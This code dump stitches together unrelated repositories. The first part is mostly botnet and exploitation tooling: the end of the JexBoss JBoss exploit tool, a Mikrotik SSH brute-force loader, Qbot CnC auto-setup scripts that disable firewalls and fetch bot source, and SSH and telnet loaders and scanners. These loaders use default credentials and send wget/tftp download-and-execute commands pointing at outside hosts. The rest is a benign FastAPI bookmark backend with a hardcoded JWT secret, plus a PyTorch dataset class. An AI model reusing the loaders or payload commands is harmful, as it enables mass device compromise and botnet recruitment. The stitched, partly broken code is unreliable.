conn.close
return getSuccessfully(url, "/jbossass/jbossass.jsp")
def clear():
if os.name == 'posix':
os.system('clear')
elif os.name == ('ce', 'nt', 'dos'):
os.system('cls')
def checkArgs(args):
if len(args) < 2 or args[1].count('.') < 1:
return 1,"You must provide the host name or IP address you want to test."
elif len(args[1].split('://')) == 1:
return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])
elif args[1].count('http') == 1 and args[1].count('.') > 1:
return 0, ""
else:
return 1, 'Parâmetro inválido'
def banner():
clear()
print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"
" | |\n"
" | @author: <NAME> |\n"
" | @contact: <EMAIL> |\n"
" | |\n"
" | @update: https://github.com/joaomatosf/jexboss |\n"
" #______________________________________________________#\n\n" )
banner()
# check python version
if sys.version_info[0] == 3:
print (RED + "\n * Not compatible with version 3 of python.\n"
" Please run it with version 2.7 or lower.\n\n"
+BLUE+" * Example:\n"
" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )
sys.exit(1)
# check Args
status, message = checkArgs(sys.argv)
if status == 0:
url = sys.argv[1]
elif status == 1:
print RED + "\n * Error: %s" %message
print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC
sys.exit(status)
elif status == 2:
url = ''.join(['http://',sys.argv[1]])
# check vulnerabilities
mapResult = checkVul(url)
# performs exploitation
for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:
if mapResult[i] == 200 or mapResult[i] == 500:
print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"
" This operation will provide a simple command shell to execute commands on the server..\n"
+RED+" Continue only if you have permission!" +ENDC)
if raw_input(" yes/NO ? ").lower() == "yes":
autoExploit(url, i)
# resume results
if mapResult.values().count(200) > 0:
banner()
print RED+ " Results: potentially compromised server!" +ENDC
print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"
" Recommendations: \n"
" - Remove web consoles and services that are not used, eg:\n"
" $ rm web-console.war\n"
" $ rm http-invoker.sar\n"
" $ rm jmx-console.war\n"
" $ rm jmx-invoker-adaptor-server.sar\n"
" $ rm admin-console.war\n"
" - Use a reverse proxy (eg. nginx, apache, f5)\n"
" - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
" - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"
" References:\n"
" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
"\n"
" - If possible, discard this server!\n\n"
" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )
elif mapResult.values().count(505) == 0:
print ( GREEN+ "\n\n * Results: \n"
" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)
# infos
print (ENDC+" * Info: review, suggestions, updates, etc: \n"
" https://github.com/joaomatosf/jexboss\n"
" <EMAIL>\n")
print ENDC
```
#### File: MIRAI SPLOITS/MIKROTIK SSH LOADER/Mikload.py
```python
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null")
blacklisted = ["127.0","10.0","192.168"] #You can these out add or whatever u want lol
#server_ip = useless atm
passwords = ["<PASSWORD>"]
if sys.argv[4] == "root":
passwords = ["<PASSWORD>"]
if sys.argv[4] == "guest":
passwords = ["<PASSWORD>"]
if sys.argv[4] == "telnet":
passwords = ["<PASSWORD>"]
if len(sys.argv) < 4:
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
print """\n\x1b[0;37m******************************
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
******************************\x1b[0m"""
def sshscanner(ip):
global passwords
try:
thisipisbad='no'
for badip in blacklisted:
if badip in ip:
thisipisbad='yes'
if thisipisbad=='yes':
sys.exit()
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((ip, port))
data = str(s.recv(1024))
if "SSH" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
elif "ssh" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
else:
sys.exit()
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
break
except:
pass
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
if badserver == False:
print("\x1b[1;37mAttempting Mikrotik \x1b[1;33m-- \x1b[1;35m" + ip + ":" + username + ":" + password + "\<PASSWORD>")
ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://172.16.58.325/8UsA.sh; curl -O http://104.248.251.125/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 172.16.17.32 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 172.16.17.32; chmod 777 t8UsA2.sh; sh t8UsA2.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh")
vulns = open("Mikrotik.txt", "a").write(username + ":" + password + ":" + ip + "\n") #This is not needed u can take it out if u want
time.sleep(12)
ssh.close()
except Exception as e:
pass
if sys.argv[2] == "KOWAI":
ranges = ["188.16.000.000/172.16.31.10/192.168.3.11/172.16.31.10/"]
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
if sys.argv[2] != "KOWAI":
a = int(sys.argv[2].split(".")[0])
b = int(sys.argv[2].split(".")[1])
c = int(sys.argv[2].split(".")[2])
d = int(sys.argv[2].split(".")[3])
else:
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
x = 0
while(True):
try:
if sys.argv[2] != "KOWAI":
endaddr = sys.argv[3]
else:
endaddr = endrng
d += 1
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if d > 255:
c += 1
d = 0
if c > 255:
b += 1
c = 0
if b > 255:
a += 1
b = 0
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if ipaddr == endaddr:
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if x > 500:
time.sleep(1)
x = 0
t = threading.Thread(target=sshscanner, args=(ipaddr,))
t.start()
except Exception as e:
pass
print "\x1b[37mDone\x1b[37m"
```
#### File: Qbot/auto setup/Darkraii AutoSetup.py
```python
import subprocess
def cri(cmd):
subprocess.call(cmd, shell=True)
def replace_line(file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
print'\x1b[34m DDDDDDD AAAAAAAA RRRRRR KK K RRRRRR AAAAAAAA I '
print'\x1b[34mDDDDDDDDD AAAAAAAAAA RRRRRRRR KKK KK RRRRRRRR AAAAAAAAAA II '
print'\x1b[34mDDD `DDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDD DDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDD DDD AAAAAAAAAA RRR RRR KKK KKK RRR RRR AAAAAAAAAA III '
print'\x1b[34mDDD DDD AAAAAAAAAA RRR RRRR KKKKKKKKKK RRR RRRR AAAAAAAAAA III '
print'\x1b[34mDDD DDD AAA AAA RRRRRRRRR KKKKKKKKK RRRRRRRRR AAA AAA III '
print'\x1b[34mDDD DDD AAA AAA RRRR RRRR KKK KKK RRRR RRRR AAA AAA III '
print'\x1b[34mDDD DDD AAA AAA RRR `RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDD DDDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDDDDDDDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDDDDDDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34m AA RR RR KK KK RR RR AA II '
print'\x1b[34m A R R K K R R A I '
print'\x1b[1;37m[\x1b[34mDarkRai\x1b[1;37m] \x1b[1;37mCnC AutoSetup \nDeveloped By \x1b[0;31mFlexingOnLamers\x1b[1;37m/\x1b[0;31mCri '
ip = raw_input("\x1b[1;37mEnter Your Server IP:\x1b[1;35m")
user = raw_input("\x1b[1;37mEnter Desired Username:\x1b[1;35m")
passw = raw_input("\x1b[1;37mEnter Desired Password:\x1b[1;35m")
bport = raw_input("\x1b[1;37mEnter Desired BotPort:\x1b[0;31m")
port = raw_input("\x1b[1;37mEnter The Port You Want to screen on:\x1b[1;35m")
print '\x1b[1;35mInstalling Needed Dependencies..\x1b[1;37m'
cri('yum update -y')
cri('yum install python-paramiko gcc screen nano wget httpd iptables perl -y;')
cri('yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y')
cri('yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y')
cri('yum install epel-release -y')
cri('yum install gengetopt -y')
cri('wget -q https://pastebin.com/raw/zgtwniBk -O darkrai.c')
cri('gcc -o darkrai darkrai.c -pthread')
cri('wget -q https://pastebin.com/raw/idY5wpEu -O client.c')
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
cri('service iptabes stop')
cri('service httpd restart')
cri('systemctl stop firewalld')
cri('httpd -k restart')
cri('httpd -krestart')
cri('pkill screen')
replace_line('client.c', 859, 'unsigned char *AllDemDupes[] = { "'+ ip +':'+ bport +'" };\n')
replace_line('client.c', 861, 'char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";\n')
cri("echo "+ user +" "+ passw +" >> login.txt")
cri("python cc7.py client.c "+ ip + "")
cri("screen ./darkrai "+ bport +" 1 "+ port +"")
print '\x1b[1;37mWget/CHARLINE Below!'
print '\x1b[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *'
print '\x1b[1;37mThank you for using the \x1b[1;37m[\x1b[0;31mDarkRai\x1b[1;37m] \x1b[1;37mCnC AutoSetup \n\x1b[0;31mPastebin\x1b[1;37m:\x1b[1;36mhttps://pastebin.com/u/flexingonlamers \n\x1b[0;31mGithub\x1b[1;37m:\x1b[1;36mhttps://github.com/AgentCri/ \n\x1b[0;31mEmail\x1b[1;37m:\x1b[1;36mcri@<EMAIL> \n\x1b[0;31mDiscord\x1b[1;37m:\x1b[1;36mCri#4614'
```
#### File: Qbot/auto setup/ReaperV2Public.py
```python
import subprocess, time
def cri(cmd):
subprocess.call(cmd, shell=True)
def jack(file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
USER = raw_input("\x1b[1;34mUsername\x1b[1;37m:\x1b[1;31m")
PASSWR = raw_input("\x1b[1;34mPassword\x1b[1;37m:\x1b[1;31m")
time.sleep(2)
cri('clear')
print("\x1b[1;37mWelcome \x1b[1;34m"+ USER +" \x1b[1;37mTo the \x1b[1;31mReaper v2 \x1b[1;34mCnC\x1b[1;37m_\x1b[1;34mBashLite \x1b[1;37mAutoSetup!\n\x1b[1;37mDeveloped By \x1b[1;31mcri/\x1b[1;34mcri\x1b[1;37m")
user = raw_input("\x1b[1;34mUsername\x1b[1;37m:\x1b[1;31m")
passw = raw_input("\x1b[1;34mPassword\x1b[1;37m:\x1b[1;31m")
ip = raw_input("\x1b[1;34mServer IP\x1b[1;37m:\x1b[1;31m")
bport = raw_input("\x1b[1;34mBotPort\x1b[1;37m:\x1b[1;31m")
port = raw_input("\x1b[1;34mScreening Port\x1b[1;37m:\x1b[1;31m")
cri('yum install gcc')
cri('yum install screen')
cri('wget -q https://pastebin.com/raw/uUcscZAG -O reaper.c')
cri('gcc -o reaper reaper.c -pthread; rm -rf reaper.c')
cri('wget -q https://pastebin.com/raw/y2D98UHd -O client.c')
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
cri('service iptables stop')
cri('service httpd restart')
jack('client.c', 35, 'unsigned char *commServer[] = {"'+ ip +':'+ bport +'"};\n')
cri('echo '+ user +' '+ passw +' >> reaper.txt')
cri('python cc7.py client.c '+ ip +'')
cri('screen ./reaper '+ bport +' 1 '+ port +'')
print '\x1b[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *'
```
#### File: Scanning/SSH/wget.py
```python
!/usr/bin/python
import sys, re, os, paramiko
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
paramiko.util.log_to_file("/dev/null")
cmd="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh" #command to send
r34d = open(str(sys.argv[1]),'a+')
print "\033[31mStarting Scan!\n"
def w0rk(username,password,ip):
try:
port = 22
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
print "\033[32m[\033[31m+\033[32m] Command Sent: "+ip+"\033[37m\n"
ssh.exec_command(""+cmd+"")
ssh.close()
except:
pass
for line in r34d:
ip_1nfo = line.split(":")
g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
g0d.start()
username=ip_1nfo[0]
password=<PASSWORD>[1]
ip=ip_1nfo[2]
g0d.join()
```
#### File: TELNET/PY LOADER/telnet_loader.py
```python
import sys, re, os, paramiko, socket
from threading import Thread
from time import sleep
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
paramiko.util.log_to_file("/dev/null")
rekdevice="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.16.31.10/update.sh; busybox wget http://172.16.31.10/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
print "\033[31m"
print "S-S-SUUUPER fast telnet loader by Milenko"
print
#simply find and replace newlines to :: then a newline so every IP starts with ::. It will scan those for port 22 or whatever your skiddie heart desires </3
print "Reads ip:user:pass and simply checks the IP for port 23."
print "Then writes loads the bonet onto it and saves the logins with SSH running to \"telnetopen.txt\""
print "It is VERY fast and extremely efficient."
print "As it splits the file into equal chunks for each thread!"
threads = int(raw_input("Threads: "))
lines = open(sys.argv[1],"r").readlines()
fh = open("telnetopen.txt","a+")
def chunkify(lst,n):
return [ lst[i::n] for i in xrange(n) ]
running = 0
loaded = 0
def printStatus():
while 1:
sleep(10)
print "\033[32m[\033[31m+\033[32m] Total eye pees loaded: " + str(loaded) + "\033[37m"
if loaded >= 1000:
print "Dayum u got sum phat hax brah :^}"
def haxit(ip, username, password):
tn = telnetlib.Telnet(self.ip)
try:
tn.read_until(b"sername: ")
tn.write(username + "\n")
tn.read_until(b"assword: ")
tn.write(password + "\n")
prompt = tn.read_all()
if "$" in prompt or "#" in prompt:
tn.write(tekdevice + "\n")
print "\033[32m[\033[31m+\033[32m] Command Sent: " + ip + "\033[37m"
except:
pass
def check(chunk, fh):
global running
running += 1
threadID = running
for login in chunk:
if login.startswith("DUP"):
continue # skip DUPS cause fuck em
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.37)
try:
s.connect((login.split(":")[2], 23))
s.close()
print "\033[32m[\033[31m+\033[32m] " + login + " has telnet open. Loading..."
haxit(login.split(":")[0], login.split(":")[1], login.split(":")[2])
fh.write(login + "\r\n")
fh.flush()
except:
pass
print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs. Loaded: " + str(loads)
running -= 1
lines = map(lambda s: s.strip(), lines) # remove all newlines
chunks = chunkify(lines, threads) # make seperate chunk for each thread
print "STARTING SCAN AND LOAD!!!"
Thread(target = printStatus, args = ()).start()
for thread in xrange(0,threads):
if thread >= 384:
time.sleep(0.2)
try:
Thread(target = check, args = (chunks[thread], fh,)).start()
except:
pass
print "Scanning... Press enter 3 times to stop."
for i in range(0,3):
raw_input()
fh.close()
os.popen("kill -9 " + str(os.getpid()))
```
#### File: Scanning/TELNET/telnet.py
```python
import threading
import sys, os, re, time, socket
from sys import stdout
if len(sys.argv) < 3:
print "Usage: python "+sys.argv[0]+" <threads> <output file>"
sys.exit()
combo = [
"support:support",
"root:vizxv",
"root:xc3511",
"telnet:telnet",
"root:root",
"supervisor:zyad1234",
"root:",
"admin:1234",
"user:user",
"root:antslq",
"admin:admin",
"root:5up"
]
threads = int(sys.argv[1])
output_file = sys.argv[2]
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket()
tn.settimeout(8)
tn.connect((self.ip,23))
except Exception:
tn.close()
break
try:
hoho = ''
hoho += readUntil(tn, "ogin:")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
success = True
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
success = True
else:
tn.close()
if success == True:
try:
os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
tn.send("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.168.127.12/update.sh; busybox wget http://192.168.127.12/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh\n")
print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
tn.close()
break
except:
tn.close()
else:
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def Gen_IP():
not_valid = [10,127,169,172,192]
first = random.randrange(1,256)
while first in not_valid:
first = random.randrange(1,256)
ip = ".".join([str(first),str(random.randrange(1,256)),
str(random.randrange(1,256)),str(random.randrange(1,256))])
return ip
def HaxThread():
while 1:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(370)
IP = Gen_IP()
s.connect((IP, 23))
s.close()
print "\033[32m[\033[31m+\033[32m] FOUND " + IP
thread = router(IP)
thread.start()
except:
pass
if __name__ == "__main__":
threadcount = 0
for i in xrange(0,threads):
try:
threading.Thread(target=HaxThread, args=()).start()
threadcount += 1
except:
pass
print "[*] Started " + str(threadcount) + " scanner threads!"
``` |
{
"source": "1uciuszzz/mark-library",
"score": 3
} |
#### File: mark-library/back-end/database.py
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import sessionmaker, Session
DB = "postgresql"
DB_API = "psycopg2"
HOST = "127.0.0.1"
PORT = "5432"
USER = "<fill here please>"
PASSWORD = "<fill <PASSWORD>>"
DB_NAME = "<fill here please>"
DB_URL = f"{DB}+{DB_API}://{USER}:{PASSWORD}@{HOST}:{PORT}/{DB_NAME}"
engine = create_engine(url=DB_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
def get_db():
db: Session = SessionLocal()
try:
yield db
finally:
db.close()
```
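A short sketch of how `get_db` is intended to be consumed as a FastAPI dependency; the route below is purely illustrative and not part of the project:
```python
from fastapi import APIRouter, Depends
from sqlalchemy.orm import Session

from database import get_db

router = APIRouter()

@router.get("/health")
async def health_check(db: Session = Depends(get_db)):
    # A session is opened per request and closed again by get_db's finally block.
    return {"db_active": db.is_active}
```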
#### File: router/admin/auth.py
```python
from datetime import datetime, timedelta
from fastapi import APIRouter, Depends
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from jose import JWTError, jwt
from sqlalchemy.orm import Session
from schema import Token
from models import User
from util import error, hash
from database import get_db
SECRET_KEY = "28ac48bbb7813016a8edd769ed93628160d5543896c1c2f2a32f61daf6d25ef4"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_DAY = 7
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/admin/auth/signin")
router = APIRouter(prefix="/admin/auth", tags=["Admin-Auth"])
def create_access_token(data: dict):
to_encode = data.copy()
expire = datetime.utcnow()+timedelta(days=ACCESS_TOKEN_EXPIRE_DAY)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(
claims=to_encode, key=SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
async def get_current_user(token: str = Depends(oauth2_scheme), db: Session = Depends(get_db)) -> User:
try:
payload = jwt.decode(token=token, key=SECRET_KEY, algorithms=[ALGORITHM])
id = payload.get("uid")
if not id:
error.auth_failed("invalid token")
except JWTError:
error.auth_failed("invalid token")
user_rows = db.query(User).all()
user = None
for row in user_rows:
if(str(row.id) == id):
user = row
if not user:
error.notfound_error(f"not found user '{id}'")
return user
@router.post("/signin", response_model=Token)
async def admin_sign_in(payload: OAuth2PasswordRequestForm = Depends(), db: Session = Depends(get_db)):
user_rows = db.query(User.id, User.email, User.password).all()
user = None
for row in user_rows:
if(row.email == payload.username):
user = row
if not user:
error.notfound_error(f"not found user '{payload.username}'")
if not hash.verify_password(payload.password, user.password):
error.auth_failed("password not matched")
token = create_access_token(data={"uid": str(user.id)})
return Token(access_token=token, token_type="bearer")
```
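A hypothetical client-side sketch of obtaining and using a token from the sign-in endpoint above; the base URL and credentials are placeholders:
```python
import requests

BASE_URL = "http://127.0.0.1:8000"  # placeholder, adjust to the deployment

# OAuth2PasswordRequestForm expects form-encoded username/password fields.
resp = requests.post(
    f"{BASE_URL}/admin/auth/signin",
    data={"username": "admin@example.com", "password": "secret"})
resp.raise_for_status()
token = resp.json()["access_token"]

# Subsequent requests authenticate with a bearer header.
headers = {"Authorization": f"Bearer {token}"}
```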
#### File: router/public/p_directory.py
```python
from typing import List
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends
from models import Directory
from schema import DirectorySchema
from database import get_db
router = APIRouter(prefix="/public/d", tags=["Public-Directory"])
@router.get("/", response_model=List[DirectorySchema])
async def get_public_directories(db: Session = Depends(get_db)):
return db.query(Directory).filter(Directory.user_id ==
"6f5ac55a-3291-4b04-aa43-8c685a318e7e").all()
```
#### File: back-end/util/error.py
```python
from fastapi import HTTPException, status
def existed_error(msg: str):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail=[{"msg": msg}])
def notfound_error(msg: str):
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND, detail=[{"msg": msg}])
def auth_failed(msg: str):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED, detail=[{"msg": msg}])
```
#### File: back-end/util/public.py
```python
from fastapi import Depends
from pydantic import EmailStr
from sqlalchemy.orm import Session
from models import Role, User, Directory, Bookmark
from database import get_db
async def get_bookmark_by_id(id: str, db: Session):
b_rows = db.query(Bookmark).all()
b = None
for row in b_rows:
if str(row.id) == id:
b = row
return b
async def get_bookmark_by_dir_id_and_boomark_id(d_id: str, b_id: str, db: Session):
dir = db.query(Directory).filter(Directory.id == d_id).first()
bookmarks = dir.bookmarks
bookmark = None
for row in bookmarks:
if str(row.id) == b_id:
bookmark: Bookmark = row
return bookmark
async def get_bookmark_by_dir_id_and_boomark_name(dir_id: str, b_name: str, db: Session):
dir = db.query(Directory).filter(Directory.id == dir_id).first()
bookmarks = dir.bookmarks
bookmark = None
for row in bookmarks:
if row.name == b_name:
bookmark: Bookmark = row
return bookmark
async def get_role_by_id(id: str, db: Session = Depends(get_db)):
role_rows = db.query(Role).all()
role = None
for row in role_rows:
if str(row.id) == id:
role = row
return role
async def get_user_by_id(id: str, db: Session):
user_rows = db.query(User).all()
user = None
for row in user_rows:
if str(row.id) == id:
user = row
return user
async def get_user_by_email(email: EmailStr, db: Session):
user_rows = db.query(User).all()
user = None
for row in user_rows:
if row.email == email:
user = row
return user
async def get_dir_by_name_and_uid(name: str, uid: str, db: Session):
user_dirs = db.query(Directory).filter(Directory.user_id == uid).all()
dir = None
for row in user_dirs:
if row.name == name:
dir = row
return dir
async def get_dir_by_id(id: str, db: Session):
dir_rows = db.query(Directory).all()
dir = None
for row in dir_rows:
if str(row.id) == id:
dir = row
return dir
async def get_dirs_by_uid(uid: str, db: Session):
dir_rows = db.query(Directory).all()
res = []
for row in dir_rows:
if row.user_id == uid:
res.append(row)
return res
``` |
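A hedged sketch of how one of these lookup helpers might be awaited inside a route; the router prefix and response shape are illustrative assumptions, not part of the repository.
```python
# Hypothetical route built on the lookup helpers above.
from fastapi import APIRouter, Depends
from pydantic import EmailStr
from sqlalchemy.orm import Session
from database import get_db
from util import error, public

router = APIRouter(prefix="/public/u", tags=["Public-User"])

@router.get("/{email}")
async def read_user(email: EmailStr, db: Session = Depends(get_db)):
    user = await public.get_user_by_email(email, db)
    if not user:
        error.notfound_error(f"user '{email}' not found")
    return {"id": str(user.id), "email": user.email}
```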
{
"source": "1ucky40nc3/medicus",
"score": 3
} |
#### File: medicus/data/datasets.py
```python
from typing import Tuple
from typing import Optional
from typing import Callable
from typing import Any
import numpy as np
from PIL import Image
import torch
from .utils import list_dataset_files
from .utils import set_seed
def identity(x: Any):
return x
class SharedTransformDataset:
"""The abstract SharedTransformDataset class.
This describes a dataset that loads files from sample and target
directories, computes sample, target and even shared transforms
and later returns the data points as tuples.
Note:
1) If shared transforms between samples and targets aren't needed
then it is advised to use datasets such as
`torchvision.datasets.ImageFolder` (for images) instead.
2) The `self.load` function has to be implemented, as this is
an abstract class, to load the desired data from different file types.
Attrs:
sample_dir (str): The directory of the sample files.
target_dir (str): The directory of the target files.
transform (call): Sample transforms (see `torchvision.transforms`).
target_transform (call): Target transforms (see `torchvision.transforms`).
shared_transform (call): Shared transforms for sample and target
(see `torchvision.transforms`).
share_transform_random_seed (bool): States if the shared transforms shall
share their seed. If this is deactivated
then other datasets such as
`torchvision.datasets.ImageFolder`
(for images) should be used.
return_untransformed_sample (bool): States if instead of an (input, target)
tuple an (input, sample, target) tuple
shall be returned. Here an extra
untransformed sample is also returned.
"""
def __init__(
self,
sample_dir: str,
target_dir: str,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
shared_transform: Optional[Callable] = None,
share_transform_random_seed: bool = True,
return_untransformed_sample: bool = True,
sample_format: str = ".png",
target_format: str = ".png",
**kwargs
) -> None:
samples_list, targets_list = list_dataset_files(
sample_dir, target_dir, sample_format, target_format)
self.samples_list = samples_list
self.targets_list = targets_list
self.len = len(samples_list)
self.transform = transform if transform else identity
self.target_transform = target_transform if target_transform else identity
self.shared_transform = shared_transform if shared_transform else identity
self.share_transform_random_seed = share_transform_random_seed
self.return_untransformed_sample = return_untransformed_sample
def __len__(self) -> int:
return self.len
def share_seed(self) -> bool:
return self.share_transform_random_seed
def load(self, path: str) -> Any:
raise NotImplementedError
def __getitem__(
self,
index: int
) -> Tuple[torch.Tensor, torch.Tensor]:
sample = self.samples_list[index]
target = self.targets_list[index]
sample = self.load(sample)
target = self.load(target)
if self.share_seed():
seed = np.random.randint(2147483647)
set_seed(seed)
sample = self.shared_transform(sample)
input = self.transform(sample)
if self.share_seed():
set_seed(seed)
target = self.shared_transform(target)
target = self.target_transform(target)
if self.return_untransformed_sample:
return input, sample, target
return input, target
class SharedTransformImageDataset(SharedTransformDataset):
"""The SharedTransformImageDataset class.
This describes a dataset that loads files from sample and target
directories, computes sample, target and even shared transforms
and later returns the data points as tuples.
Note:
1) If shared transforms between samples and targets aren't needed
then it is advised to use datasets such as
`torchvision.datasets.ImageFolder` instead.
Attrs:
